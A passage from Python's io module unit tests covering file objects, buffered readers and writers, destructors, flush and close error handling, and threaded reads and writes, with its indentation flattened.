        # therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1 // 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1 // 0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super(MyFileIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyFileIO, self).close()
def flush(self):
record.append(3)
super(MyFileIO, self).flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super(MyIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super(MyIO, self).close()
def flush(self):
record.append(self.on_flush)
super(MyIO, self).flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array(b'i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
support.gc_collect()
self.assertEqual(recorded, [])
def test_invalid_newline(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
support.gc_collect()
self.assertEqual(recorded, [])
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
stream = Stream()
buffer = byteslike(5)
self.assertEqual(stream.readinto(buffer), 5)
self.assertEqual(buffer.tobytes(), b"12345")
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
test_array_writes = unittest.skip(
"len(array.array) returns number of elements rather than bytelength"
)(IOTest.test_array_writes)
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super(MyBufferedIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyBufferedIO, self).close()
def flush(self):
record.append(3)
super(MyBufferedIO, self).flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name=u'dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError('flush')
def bad_close():
raise IOError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(IOError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises((AttributeError, TypeError)):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading differently, so
        # checking this is not so easy.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
        # The Python version has __del__, so it ends up in gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
@support.impl_detail(cpython=True)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents,
b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise IOError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
        # The Python version has __del__, so it ends up in gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
@support.impl_detail(cpython=True)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
